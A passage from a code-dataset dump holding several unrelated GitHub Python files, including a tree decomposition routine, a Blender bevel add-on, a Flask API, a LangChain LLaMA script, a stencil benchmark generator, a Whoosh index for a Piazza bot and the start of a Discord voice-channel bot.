d\n if ch.diameter > node.diameter:\n node.diameter = ch.diameter\n node.bestLCA = ch.bestLCA\n# node.diameter = max(ch.diameter,node.diameter)\n\n# node.diameter = max(d1+d2, node.diameter)\n node.maxdepth = d1\n# node.maxheight = n1\n node.anchor = anchor1\n if d1+d2 > node.diameter:\n node.diameter = d1+d2\n node.bestLCA = node\n\n def __get_breaking_edge__(tre, edge_type):\n if tre.seed_node.nleaf <= max_size and \\\n tre.seed_node.diameter <= max_diam:\n return None\n if edge_type == 'midpoint':\n ed = __find_midpoint_edge__(tre)\n elif edge_type == 'centroid':\n ed = __find_centroid_edge__(tre)\n else:\n _LOG.warning((\"Invalid decomposition type! Please use either \"\n \"'midpoint' or 'centroid'\"))\n return None\n\n n = ed.head_node.nleaf\n if (n < min_size) or (tre.seed_node.nleaf - n) < min_size:\n return None\n return ed\n\n def __check_stop__(tre):\n return ((tre.seed_node.nleaf <= max_size and\n tre.seed_node.diameter <= max_diam) or\n (tre.seed_node.nleaf // 2 < min_size))\n\n def __break_by_MP_centroid__(tre):\n ed = __get_breaking_edge__(tre, 'midpoint')\n if ed is None:\n # print(\"Midpoint failed. Trying centroid decomposition...\")\n ed = __get_breaking_edge__(tre, 'centroid')\n # else:\n # print(\"Successfully splitted by midpoint\")\n return ed\n\n def __break(tre):\n if strategy == \"centroid\":\n return __get_breaking_edge__(tre, 'centroid')\n elif strategy == \"midpoint\":\n return __break_by_MP_centroid__(tre)\n else:\n raise Exception(\"strategy not valid: %s\" % strategy)\n\n tqueue = Queue()\n\n _LOG.debug(\"Starting brlen decomposition ...\")\n __ini_record__()\n min_size = min_size if min_size else 0\n max_size = max_size if max_size else a_tree.seed_node.nleaf\n max_diam = max_diam if max_diam else a_tree.seed_node.diameter\n\n _LOG.debug(\n \"Now breaking by %s with min %d and max %d sizes and diameter %f ...\" %\n (strategy, min_size, max_size, max_diam))\n # try using midpoint\n e = __break(a_tree)\n\n if e is None:\n __clean_up__(a_tree)\n return [a_tree]\n\n tree_map = []\n tqueue.put((a_tree, e))\n while not tqueue.empty():\n t, e = tqueue.get()\n t1, t2 = __bisect__(t, e)\n e1 = __break(t1)\n if e1 is None:\n __clean_up__(t1)\n tree_map.append(t1)\n else:\n tqueue.put((t1, e1))\n e2 = __break(t2)\n if e2 is None:\n __clean_up__(t2)\n tree_map.append(t2)\n else:\n tqueue.put((t2, e2))\n\n return tree_map\n","repo_name":"smirarab/sepp","sub_path":"sepp/decompose_tree.py","file_name":"decompose_tree.py","file_ext":"py","file_size_in_byte":6623,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"48"} +{"seq_id":"28738632304","text":"import os\nimport bpy\nimport bmesh\nfrom bpy.props import *\nimport bgl\nimport blf\nfrom . utils.blender_ui import get_dpi, get_dpi_factor\n\n\n##############################\n#NEW MODAL BEVEL\n#############################\n\n\ndef draw_callback_pb(self, context):\n\n font_id = 0 # XXX, need to find out how best to get this.\n #set_drawing_dpi(display.get_dpi() * scale_factor)\n #dpi_factor = display.get_dpi_factor() * scale_factor\n #line_height = 18 * dpi_factor\n \n is_bool = False\n is_bevel = False\n is_bevel_3 = False\n is_bevel_2 = False\n is_solidify = False\n is_multiselected = False\n is_notselected = False\n is_noactiveobject = False\n multislist = bpy.context.selected_objects\n activeobject = bpy.context.scene.objects.active\n is_formerge = False\n current_dir = os.path.basename(os.path.dirname(os.path.abspath(__file__)))\n user_preferences = bpy.context.user_preferences\n addon_pref = user_preferences.addons[current_dir].preferences\n x = get_dpi()\n scale_factor = 0.9\n dpi_factor = get_dpi_factor() * scale_factor\n\n if len(multislist) > 1:\n is_multiselected = True\n if len(multislist) < 1:\n is_notselected = True\n if activeobject == None:\n is_noactiveobject = True\n\n for obj in bpy.context.selected_objects:\n if obj.name.startswith(\"AP\"):\n is_formerge = True\n pass\n\n for mode in bpy.context.object.modifiers :\n if mode.type == 'BEVEL' :\n if mode.limit_method == 'WEIGHT':\n is_bevel = True\n if mode.type == \"BEVEL\":\n if mode.profile > 0.70 and mode.profile < 0.72:\n is_bevel_3 = True\n #print(\"Bevel 3 is true\")\n if mode.type == \"BEVEL\":\n if mode.limit_method == 'ANGLE' or mode.limit_method == 'NONE':\n is_bevel_2 = True\n #print(\"Bevel 2 is true\")\n if mode.type == 'BOOLEAN' :\n is_bool = True\n if mode.type == 'SOLIDIFY':\n is_solidify = True\n #Min and Max Idea\n if self.lvl == 1:\n #Show Segments Size\n bgl.glEnable(bgl.GL_BLEND)\n blf.position(font_id, self.click_pos[0], self.click_pos[1]+0.83 * get_dpi(), 0)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n blf.size(font_id, 12, get_dpi())\n blf.draw(font_id, \" (Min)\")\n \n if self.lvl == 16:\n #Show Segments Size\n bgl.glEnable(bgl.GL_BLEND)\n blf.position(font_id, self.click_pos[0], self.click_pos[1]+0.83 * get_dpi(), 0)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n blf.size(font_id, 12, get_dpi())\n blf.draw(font_id, \" (Max)\")\n \n #Show Segments Size\n bgl.glEnable(bgl.GL_BLEND)\n blf.position(font_id, self.click_pos[0], self.click_pos[1]+0.55 * get_dpi() , 0)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n blf.size(font_id, 36, get_dpi())\n blf.draw(font_id, str(self.lvl))\n \n # And Underline Up Top\n #blf.position(font_id, self.click_pos[0], self.click_pos[1]+34, 0)\n bgl.glEnable(bgl.GL_BLEND)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n bgl.glLineWidth(int(0.032* get_dpi()) )\n bgl.glBegin(bgl.GL_LINE_STRIP)\n #bgl.glVertex2d(20, 40)\n for n in range(-1,int(2.7 * get_dpi()) ): bgl.glVertex2i(self.click_pos[0]+n+2, self.click_pos[1]+int(get_dpi()/2.2))\n bgl.glEnd() \n \n #Show All Bevel Information \n bgl.glEnable(bgl.GL_BLEND) \n blf.position(font_id, self.click_pos[0], self.click_pos[1]+0.208 * get_dpi(), 0)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n blf.size(font_id, 12, get_dpi())\n blf.draw(font_id, \"B-Width - \" + '%.3f'%( self.mouse_pos) + \" / \" + \" / \" + \"(W) - \" + bpy.context.object.modifiers[\"Bevel\"].offset_type)\n #blf.draw(font_id, \"Bevel Width - \" + '%.3f'%( self.mouse_pos) + \" / \" + \"Segments - \" + str(self.lvl) + \" / \" + \"(W)idth Method - \" + bpy.context.object.modifiers[\"Bevel\"].offset_type)\n \n # And Underline Up Bottom\n\n bgl.glEnable(bgl.GL_BLEND)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n bgl.glLineWidth(int(0.032* get_dpi()) )\n bgl.glBegin(bgl.GL_LINE_STRIP)\n\n for n in range(-1,int(2.7 * get_dpi()) ): bgl.glVertex2i(self.click_pos[0]+n+2, self.click_pos[1]+int(get_dpi()/10.2))\n bgl.glEnd() \n \n #Show Additional Mesh Information \n bgl.glEnable(bgl.GL_BLEND) \n blf.position(font_id, self.click_pos[0], self.click_pos[1]-0.13* get_dpi(), 0)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n blf.size(font_id, 12, get_dpi())\n if is_bevel_2 == True:\n blf.draw(font_id, \"Standard Mesh\")\n elif is_bevel_3 == True:\n blf.draw(font_id, \"CStep / Sstep - Warning: Bevels could not be showing due to bevel baking.\")\n elif is_bevel == True:\n blf.draw(font_id, \"CSsharp / Ssharp\")\n elif is_bool == True:\n blf.draw(font_id, \"Pending Boolean - Warning: Bevels could not be showing due to boolean pending.\")\n \n if addon_pref.Diagnostics_Mode :\n #Diagnostic\n bgl.glEnable(bgl.GL_BLEND)\n blf.position(font_id, self.click_pos[0], self.click_pos[1]-0.37* get_dpi, 0)\n bgl.glColor4f(1.0, 1.0, 1.0, 0.5)\n blf.size(font_id, 12, get_dpi())\n blf.draw(font_id, \"Standard is - \" + str(is_bevel_2) + \" \" + \"Sstep is - \" + str(is_bevel_3)+ \" \" + \"CSharp is - \" + str(is_bevel))\n\n \nclass nwBevel(bpy.types.Operator):\n bl_idname = \"view3d.bevelx\"\n bl_label = \"BevelSpecial (NW)\"\n bl_options = {'REGISTER', 'UNDO'} \n\n first_mouse_x = IntProperty()\n first_value = FloatProperty()\n angle = FloatProperty()\n \n def vdist(self):\n area=bpy.context.window.screen.areas[0]\n for x in bpy.context.window.screen.areas:\n if x.type=='VIEW_3D': area=x\n\n area.spaces[0].region_3d.view_distance\n return area.spaces[0].region_3d.view_distance\n \n def modal(self, context, event):\n context.area.tag_redraw()\n\n if event.type == 'MOUSEMOVE':\n\n delta = self.first_mouse_x - event.mouse_x\n \n self.mouse_pos=round(self.mouse_pos*10000)/10000\n #print (self.activeA)\n\n bpy.context.object.modifiers[self.bname].width = self.first_value + delta * 0.0008\n self.mouse_pos = round(bpy.context.object.modifiers[self.bname].width *10000)/10000\n\n if event.type == 'MOUSEMOVE' and event.shift:\n\n delta = self.first_mouse_x - event.mouse_x\n \n self.mouse_pos=round(self.mouse_pos*10000)/10000\n #print (self.activeA)\n\n bpy.context.object.modifiers[self.bname].width = self.first_value + delta * 0.0001\n self.mouse_pos = round(bpy.context.object.modifiers[self.bname].width *10000)/10000\n\n elif event.type == 'W' and event.value=='PRESS':\n modt=bpy.context.object.modifiers[self.bname].offset_type\n i=0\n \n for x in self.atype:\n i+=1\n if modt==x: break\n if i==3: i=0 \n\n bpy.context.object.modifiers[self.bname].offset_type=self.atype[i]\n self.activeA=self.atype[i]\n\n elif event.type == 'LEFTMOUSE':\n bpy.types.SpaceView3D.draw_handler_remove(self._handle, 'WINDOW')\n return {'FINISHED'}\n\n elif event.type == 'SPACE':\n bpy.types.SpaceView3D.draw_handler_remove(self._handle, 'WINDOW')\n return {'FINISHED'}\n\n\n elif event.type == 'WHEELUPMOUSE':\n\n if(self.lvl<16): self.lvl+=1\n bpy.context.object.modifiers[self.bname].segments=self.lvl\n\n elif event.type == 'NUMPAD_PLUS' and event.value=='PRESS':\n\n if(self.lvl<16): self.lvl+=1\n bpy.context.object.modifiers[self.bname].segments=self.lvl\n \n \n elif event.type == 'WHEELDOWNMOUSE':\n \n if(self.lvl>1): self.lvl-=1\n bpy.context.object.modifiers[self.bname].segments=self.lvl \n\n elif event.type == 'NUMPAD_MINUS' and event.value=='PRESS':\n \n if(self.lvl>1): self.lvl-=1\n bpy.context.object.modifiers[self.bname].segments=self.lvl \n\n elif event.type in {'DEL', 'BACK_SPACE'}:\n bpy.ops.object.modifier_remove(modifier=self.bname)\n return {'CANCELLED'} \n \n elif event.type in {'RIGHTMOUSE', 'ESC'}:\n i=-1\n \n if event.type == 'ESC' and self.newlyCreated: bpy.ops.object.modifier_remove(modifier=self.bname) \n\n bpy.types.SpaceView3D.draw_handler_remove(self._handle, 'WINDOW')\n bpy.context.object.draw_type = 'TEXTURED'\n return {'CANCELLED'}\n\n return {'RUNNING_MODAL'}\n\n def invoke(self, context, event):\n if context.area.type == 'VIEW_3D':\n # the arguments we pass the the callback\n obj=bpy.context.object\n is_bevel = False\n\n\n for mode in bpy.context.object.modifiers :\n if mode.type == 'BEVEL' :\n is_bevel = True\n\n if is_bevel == False:\n bpy.context.object.modifiers.new(\"Bevel\", \"BEVEL\")\n bpy.context.object.modifiers[\"Bevel\"].use_clamp_overlap = False\n bpy.context.object.modifiers[\"Bevel\"].show_in_editmode = False\n #bpy.context.object.modifiers[\"Bevel\"].width = bevelwidth\n bpy.context.object.modifiers[\"Bevel\"].segments = 3\n bpy.context.object.modifiers[\"Bevel\"].profile = 0.70\n bpy.context.object.modifiers[\"Bevel\"].show_in_editmode = True\n \n self.first_value = context.object.modifiers[\"Bevel\"].width\n hasBevel=False\n subd=0\n i=0\n bname=\"\"\n self.newlyCreated=False\n \n for mod in obj.modifiers:\n i+=1\n #print (mod.type)\n if mod.type==\"SUBSURF\":\n subd=i\n #print (\"SUBSURFACE!!\")\n if mod.type==\"BEVEL\" and mod.limit_method!='WEIGHT':\n hasBevel=True\n bname=mod.name\n \n if subd==0:\n for mod in obj.modifiers:\n if mod.type==\"SUBSURF\":\n subd=i\n\n \n if not hasBevel:\n\n #bpy.ops.object.modifier_add(type='BEVEL')\n bname=bpy.context.object.modifiers[\"Bevel\"].name\n #bpy.context.object.modifiers[len(bpy.context.object.modifiers)-1].use_clamp_overlap = False\n #elf.newlyCreated=True\n\n\n #bpy.context.object.modifiers[len(bpy.context.object.modifiers)-1].limit_method='WEIGHT'\n #bpy.context.object.modifiers[len(bpy.context.object.modifiers)-1].width=self.vdist()/50\n\n\n obj.update_from_editmode() # Loads edit-mode data into object data\n self.bname=bname\n bpy.ops.object.mode_set(mode='OBJECT')\n \n self.lvl=bpy.context.object.modifiers[self.bname].segments \n self.slvl=self.lvl\n self.click_pos=[event.mouse_region_x,event.mouse_region_y];\n self.mouse_pos = event.mouse_x\n self.first_mouse_x = event.mouse_x\n self.startPos=bpy.context.object.modifiers[self.bname].width;\n args = (self, context)\n\n \n self.atype=['OFFSET', 'WIDTH', 'DEPTH', 'PERCENT']\n self.btype=['NONE', 'ANGLE', 'WEIGHT', 'VGROUP']\n \n modt=bpy.context.object.modifiers[self.bname].offset_type\n i=0\n for x in self.atype:\n i+=1\n if modt==x: break\n #if i>3: i=0 \n self.activeA=self.atype[i-1]\n \n \n modL=bpy.context.object.modifiers[self.bname].limit_method\n i=0\n for x in self.atype:\n i+=1\n if modL==x: break\n if i>=3: i=0 \n self.activeL=self.btype[i]\n \n\n \n self._handle = bpy.types.SpaceView3D.draw_handler_add(draw_callback_pb, args, 'WINDOW', 'POST_PIXEL')\n\n\n context.window_manager.modal_handler_add(self)\n return {'RUNNING_MODAL'}\n else:\n self.report({'WARNING'}, \"View3D not found, cannot run operator\")\n return {'CANCELLED'}\n","repo_name":"mx1001/hops_p","sub_path":"modal_bevel.py","file_name":"modal_bevel.py","file_ext":"py","file_size_in_byte":12405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34793582969","text":"from json import dumps\nfrom math import inf\n\nfrom flask import session, request\nfrom flask.views import MethodView\nfrom project.modules import modules, public\nfrom project.web.pydocs.libs.auth import login_required\n\n\nclass SystemAPI(MethodView):\n init_every_request = False\n\n def __init__(self):\n ...\n\n @login_required()\n def post(self):\n _request = request.json\n site_id = _request.get(\"site_id\", None)\n print(_request)\n\n if session.get(\"level\", inf) <= 2:\n _ret = public.siteDatas[\"*\"]\n else:\n _userSites = session.get(\"sites\", [])\n if _userSites:\n _ret = public.siteDatas[_userSites]\n else:\n _ret = []\n\n if site_id is None:\n return dumps([{y: z for y, z in x.items() if y in [\"id\", \"site_name\"]} for x in _ret])\n\n _ret = [x[\"areas\"] for x in _ret if x[\"id\"] == site_id]\n if _ret:\n _ret = _ret[0]\n\n block_id = _request.get(\"block_id\", None)\n if block_id is None:\n return dumps([{y: z for y, z in x.items() if y in [\"id\", \"name\"]} for x in _ret])\n\n _ret = [x for x in _ret if x[\"id\"] == block_id]\n if not _ret:\n return dumps([])\n _ret = _ret[0]\n\n system_id = _request.get(\"system_id\", None)\n if system_id is None:\n return dumps(_ret[\"systems\"])\n _devices = [{\"device_id\": x.device_id, \"device_name\": x.device_name, \"connected\": x.connected} for x in public.deviceClients.values() if x.site_id == site_id\n and x.block_id == block_id and x.system_id == system_id]\n return dumps(_devices)\n\n\nmodules.app.add_url_rule(f\"/api/test\", view_func=SystemAPI.as_view(\"api111111\"))\n","repo_name":"Emre06-gazi/SiteManagementSystems","sub_path":"server/project/web/pydocs/apis/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"24795608780","text":"# 函数只要不调用,就不执行\ndef test1():\n print('t1开始')\n print('t1结束')\n\n\ndef test2():\n print('t2开始')\n test1()\n print('t2结束')\n\n\ntest2()\n\n\n# 定义函数求n~m之间所有整数之和\ndef count(n, m):\n nums = 0\n for i in range(n, m):\n nums += i\n return nums\n\n\nprint(count(0, 101))\n\n\n# 定义一个函数,求n的阶乘\ndef factorial(n):\n x = 1\n for i in range(1, n + 1):\n x *= i\n return x\n\n\nprint(factorial(5))\n\n\n# 计算m的阶乘之和\ndef fac_sum(m):\n x = 0\n for i in range(1, m + 1):\n x += factorial(i) # 调用factorial函数\n return x\n\n\nprint(fac_sum(5))\n","repo_name":"weizt/python_studying","sub_path":"函数/05-函数调用函数的方法.py","file_name":"05-函数调用函数的方法.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3005930985","text":"from transformers import LlamaTokenizer, LlamaForCausalLM, GenerationConfig, pipeline\nfrom transformers import BitsAndBytesConfig\n\nfrom langchain.llms import HuggingFacePipeline\nfrom langchain import PromptTemplate, LLMChain\nfrom langchain import PromptTemplate, LLMChain\nfrom langchain.chains import ConversationChain\nfrom langchain.chains.conversation.memory import ConversationBufferWindowMemory\n\nimport torch\n\nquantization_config = BitsAndBytesConfig(llm_int8_enable_fp32_cpu_offload=True)\n\ntokenizer = LlamaTokenizer.from_pretrained(\"decapoda-research/llama-7b-hf\")\n\nbase_model = LlamaForCausalLM.from_pretrained(\n \"decapoda-research/llama-7b-hf\",\n quantization_config=quantization_config,\n # load_in_8bit=True,\n # device_map='auto',\n)\n\npipe = pipeline(\n \"text-generation\",\n model=base_model, \n tokenizer=tokenizer, \n max_length=256,\n temperature=0.6,\n top_p=0.95,\n repetition_penalty=1.2\n)\n\nlocal_llm = HuggingFacePipeline(pipeline=pipe)\n\ntemplate = \"\"\"Below is an instruction that describes a task. Write a response that appropriately completes the request.\n\n### Instruction: \n{instruction}\n\nAnswer:\"\"\"\n\nprompt = PromptTemplate(template=template, input_variables=[\"instruction\"])\n\n\nllm_chain = LLMChain(prompt=prompt, \n llm=local_llm\n )\n\nquestion = \"What is the capital of India?\"\nprint(llm_chain.run(question))\n\n\nwindow_memory = ConversationBufferWindowMemory(k=7)\n\nconversation = ConversationChain(\n llm=local_llm, \n verbose=True, \n memory=window_memory\n)\n\nprint(conversation.prompt.template)\n\nconversation.prompt.template = '''The following is a friendly conversation between a human and an AI called Alpaca. \n\nCurrent conversation:\n{history}\nHuman: {input}\nAI:'''\n\nconversation.predict(input=\"What is your name?\")\n\n","repo_name":"ori257/Alpaca_Ori_Code","sub_path":"langchain_code.py","file_name":"langchain_code.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20355129022","text":"import abc\n\nfrom stencil_benchmarks.benchmarks_collection.stencils import base\n\nfrom .mixin import StencilMixin\n\n\nclass BasicStencilMixin(StencilMixin):\n @abc.abstractmethod\n def stencil_body(self):\n pass\n\n def template_file(self):\n return 'basic.j2'\n\n def template_args(self):\n return dict(**super().template_args(), body=self.stencil_body())\n\n\nclass Copy(BasicStencilMixin, base.CopyStencil):\n def stencil_body(self):\n n = self.storage_block_size // self.vector_size\n return (f'for (index_t v = 0; v < {n}; ++v)\\n'\n f' storent(&out[idx + v * {self.vector_size}], \\n'\n f' load(&inp[idx + v * {self.vector_size}]));')\n\n\nclass OnesidedAverage(BasicStencilMixin, base.OnesidedAverageStencil):\n def stencil_body(self):\n n = self.storage_block_size // self.vector_size\n o = f'v * {self.vector_size}'\n stride = self.blocked_strides[self.axis]\n if self.axis == 0:\n p1 = ', '.join(f'{i + 1}' for i in range(self.vector_size))\n return (f'vec_t inp_c, inp_pv;\\n'\n f'for (index_t v = 0; v < {n}; ++v) {{\\n'\n f' if (v == 0) inp_c = load(&inp[idx]);\\n'\n f' else inp_c = inp_pv;\\n'\n f' if (v == {n - 1})\\n'\n f' inp_pv = load(&inp[idx + {stride}]);\\n'\n f' else\\n'\n f' inp_pv = load(\\n'\n f' &inp[idx + (v + 1) * {self.vector_size}]);\\n'\n f' vec_t inp_p1 = shuffle(inp_c, inp_pv, {p1});\\n'\n f' storent(&out[idx + {o}], (inp_c + inp_p1) / 2);\\n'\n f'}}\\n')\n else:\n return (f'for (index_t v = 0; v < {n}; ++v) {{\\n'\n f' vec_t inp_c = load(&inp[idx + {o}]);\\n'\n f' vec_t inp_p1 = load(&inp[idx + {stride} + {o}]);\\n'\n f' storent(&out[idx + {o}], (inp_c + inp_p1) / 2);\\n'\n f'}}\\n')\n\n\nclass SymmetricAverage(BasicStencilMixin, base.SymmetricAverageStencil):\n def stencil_body(self):\n n = self.storage_block_size // self.vector_size\n o = f'v * {self.vector_size}'\n stride = self.blocked_strides[self.axis]\n if self.axis == 0:\n m1 = ', '.join(f'{i - 1}' for i in range(self.vector_size, 2 *\n self.vector_size))\n p1 = ', '.join(f'{i + 1}' for i in range(self.vector_size))\n return (f'vec_t inp_mv, inp_c, inp_pv;\\n'\n f'for (index_t v = 0; v < {n}; ++v) {{\\n'\n f' if (v == 0) {{\\n'\n f' inp_mv = load(&inp[idx - {stride}\\n'\n f' + {n - 1} * {self.vector_size}]);\\n'\n f' inp_c = load(&inp[idx]);\\n'\n f' }} else {{\\n'\n f' inp_mv = inp_c;\\n'\n f' inp_c = inp_pv;\\n'\n f' }}\\n'\n f' if (v == {n - 1})\\n'\n f' inp_pv = load(&inp[idx + {stride}]);\\n'\n f' else\\n'\n f' inp_pv = load(\\n'\n f' &inp[idx + (v + 1) * {self.vector_size}]);\\n'\n f' vec_t inp_m1 = shuffle(inp_mv, inp_c, {m1});\\n'\n f' vec_t inp_p1 = shuffle(inp_c, inp_pv, {p1});\\n'\n f' storent(&out[idx + {o}], (inp_m1 + inp_p1) / 2);\\n'\n f'}}\\n')\n else:\n return (f'for (index_t v = 0; v < {n}; ++v) {{\\n'\n f' vec_t inp_m1 = load(&inp[idx - {stride} + {o}]);\\n'\n f' vec_t inp_p1 = load(&inp[idx + {stride} + {o}]);\\n'\n f' storent(&out[idx + {o}], (inp_m1 + inp_p1) / 2);\\n'\n f'}}\\n')\n\n\nclass Laplacian(BasicStencilMixin, base.LaplacianStencil):\n def stencil_body(self):\n n = self.storage_block_size // self.vector_size\n o = f'v * {self.vector_size}'\n code = ''\n if self.along_x:\n code += 'vec_t inp_imvjk, inp_ijk, inp_ipvjk;\\n'\n code += f'for (index_t v = 0; v < {n}; ++v) {{\\n'\n terms = []\n if self.along_x:\n stride = self.blocked_strides[0]\n m1 = ', '.join(f'{i - 1}' for i in range(self.vector_size, 2 *\n self.vector_size))\n p1 = ', '.join(f'{i + 1}' for i in range(self.vector_size))\n code += (\n f' if (v == 0) {{\\n'\n f' inp_imvjk = load(&inp[idx - {stride}\\n'\n f' + {n - 1} * {self.vector_size}]);\\n'\n f' inp_ijk = load(&inp[idx]);\\n'\n f' }} else {{\\n'\n f' inp_imvjk = inp_ijk;\\n'\n f' inp_ijk = inp_ipvjk;\\n'\n f' }}\\n'\n f' if (v == {n - 1})\\n'\n f' inp_ipvjk = load(&inp[idx + {stride}]);\\n'\n f' else\\n'\n f' inp_ipvjk = load(\\n'\n f' &inp[idx + (v + 1) * {self.vector_size}]);\\n'\n f' vec_t inp_im1jk = shuffle(inp_imvjk, inp_ijk, {m1});\\n'\n f' vec_t inp_ip1jk = shuffle(inp_ijk, inp_ipvjk, {p1});\\n')\n terms += ['inp_im1jk', 'inp_ip1jk']\n else:\n code += f'vec_t inp_ijk = load(&inp[idx + {o}]);\\n'\n if self.along_y:\n stride = self.blocked_strides[1]\n code += (\n f' vec_t inp_ijm1k = load(&inp[idx - {stride} + {o}]);\\n'\n f' vec_t inp_ijp1k = load(&inp[idx + {stride} + {o}]);\\n')\n terms += ['inp_ijm1k', 'inp_ijp1k']\n if self.along_z:\n stride = self.blocked_strides[2]\n code += (\n f' vec_t inp_ijkm1 = load(&inp[idx - {stride} + {o}]);\\n'\n f' vec_t inp_ijkp1 = load(&inp[idx + {stride} + {o}]);\\n')\n terms += ['inp_ijkm1', 'inp_ijkp1']\n code += (f' storent(&out[idx + {o}], {len(terms)} * inp_ijk - (' +\n ' + '.join(terms) + '));'\n '}\\n')\n return code\n","repo_name":"GridTools/stencil_benchmarks","sub_path":"stencil_benchmarks/benchmarks_collection/stencils/openmp_blocked/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"43140327482","text":"from whoosh.index import create_in, open_dir\nfrom whoosh.qparser import QueryParser\nfrom whoosh.fields import *\nfrom whoosh.query import *\nimport os.path\nimport config\nimport sys\nfrom bot import Bot\nimport shutil\nfrom dateutil import parser\nfrom post import Post\nINF = 100000\n\n# deals with fetching/storing/searching data in the index\nclass Index:\n def __init__(self):\n # define schema for the index\n schema = self.get_schema()\n self.bot = Bot()\n try:\n self.ix = open_dir(config.index_directory)\n self.update_index()\n except:\n # if issues loading index, create index from scratch\n if os.path.exists(config.index_directory):\n shutil.rmtree(config.index_directory)\n os.mkdir(config.index_directory)\n self.ix = create_in(config.index_directory, schema)\n self.create_index()\n\n # tentative schema, can add more indices to this\n def get_schema(self):\n # build index on post and subject; not storing them\n # store raw json in 'json' field\n return Schema(\n id=NUMERIC(sortable=True),\n subject=TEXT,\n body=TEXT,\n date=DATETIME,\n json=STORED,\n views=NUMERIC,\n folders=TEXT,\n has_answer=BOOLEAN\n )\n\n def post_to_document(self, document):\n return { \n 'id': document.id,\n 'subject': document.subject,\n 'body': document.body,\n 'date': document.date,\n 'json': document.json,\n 'views': document.views,\n 'folders':document.folders,\n 'has_answer':document.has_answer\n } \n\n # add all documents to the index\n def add_to_index(self, documents):\n writer = self.ix.writer()\n for document in documents:\n dict = self.post_to_document(document)\n writer.add_document(**dict)\n writer.commit()\n\n # create index from scratch\n def create_index(self):\n documents = self.bot.get_all_posts()\n self.add_to_index(documents)\n print('\\nindex created!\\n\\n')\n\n # incremental update to index\n def update_index(self):\n # get the last indexed post\n last_post = self.search_numeric('id', 0, INF, 1)\n documents = self.bot.get_all_posts(last_post[0].id)\n self.add_to_index(documents)\n print('\\nindex updated!\\n\\n')\n\n # search for query terms in the description\n def search(self, query, limit, sort_by_field=None):\n print(query)\n ret_list = []\n with self.ix.searcher() as searcher:\n if sort_by_field == None:\n results = searcher.search(query, limit=limit)\n else:\n results = searcher.search(query, limit=limit, sortedby=sort_by_field, reverse=True)\n for result in results:\n ret_list.append(Post(result['json']))\n return ret_list\n\n # get all posts with field having query terms\n def search_terms(self, field, query_terms, limit = INF):\n print('searching \\'{0}\\'...'.format(query_terms))\n all_results = []\n for word in query_terms.split():\n query = Term(field, word)\n all_results.extend(self.search(query, limit))\n return all_results\n\n # get all posts with field between low and high\n def search_numeric(self, field, low=0, high=INF, limit=INF):\n query = NumericRange(field, low, high)\n return self.search(query, limit, field)\n\n # get all posts between dates start_date and end_date\n def search_date(self, field, start_date, end_date, limit=INF):\n query = DateRange(field, start_date, end_date)\n return self.search(query, limit)\n\n def search_folder(self, query_term, limit=INF):\n query = Term('folders', query_term)\n all_results = self.search(query, limit)\n return all_results\n\n def search_unanswered(self, limit=INF):\n query = Term('has_answer', False)\n all_results = self.search(query, limit)\n return all_results\n\n def search_other_unanswered(self, limit=INF):\n dummy_bot = Bot(config.class_code)\n all_posts = dummy_bot.get_all_posts()\n unanswered = []\n for post in all_posts:\n if post.has_answer == False:\n unanswered.append(post)\n return unanswered\n\ndef main():\n if len(sys.argv) == 1:\n id = Index()\n else:\n query_terms = sys.argv[1:]\n id = Index()\n results = id.search_terms('body',' '.join(query_terms))\n #results = id.search_numeric('upvotes',0, 1000, 20)\n print(len(results))\n for result in results:\n print(result)\n print('\\n')\n if len(results) == 0:\n print('no search results for the given term')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pranavr93/piazza_bot","sub_path":"src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"21426601753","text":"from discord import app_commands\nfrom dotenv import load_dotenv\nfrom discord.ext import tasks\nimport discord, os\n\nload_dotenv()\n\nclient = discord.Client(intents=discord.Intents.all())\ntree = app_commands.CommandTree(client)\n\nserver_configs = {} # Store server-specific configurations\n\n@client.event\nasync def on_ready():\n print(f'Logged in as {client.user.name}')\n check_empty_channels.start()\n await tree.sync()\n print('Synced')\n\n@tasks.loop(seconds=1)\nasync def check_empty_channels():\n for server_id, server_data in list(server_configs.items()):\n guild = client.get_guild(server_id)\n if guild:\n user_channels = server_data['user_channels']\n \n for channel_id, channel in list(user_channels.items()):\n if len(channel.members) == 0:\n await channel.delete()\n del user_channels[channel_id]\n \n \n@client.event\nasync def on_voice_state_update(member, before, after):\n guild = member.guild\n server_id = guild.id\n server_data = server_configs.get(server_id)\n\n if not server_data: return\n\n target_channel_id = server_data['target_channel_id']\n target_category_id = server_data['target_category_id']\n user_channels = server_data['user_channels']\n\n if after.channel and after.channel.id == target_channel_id:\n if member.id in user_channels:\n await member.move_to(user_channels[member.id])\n else:\n overwrites = {\n guild.default_role: discord.PermissionOverwrite(connect=False),\n member: discord.PermissionOverwrite(connect=True)\n }\n category = guild.get_channel(target_category_id)\n channel_name = f\"{member.display_name}'s room\"\n channel = await category.create_voice_channel(channel_name, overwrites=overwrites)\n user_channels[member.id] = channel\n await member.move_to(channel)\n \n if before.channel and before.channel.id == target_channel_id:\n if before.channel.name == f\"{member.display_name}'s room\":\n if member.id in user_channels:\n del user_channels[member.id]\n\n@tree.command(name=\"help\", description=\"Shows the help menu.\")\nasync def help(interaction):\n embed = discord.Embed(\n title=\"Help Menu\",\n description=\"The help menu 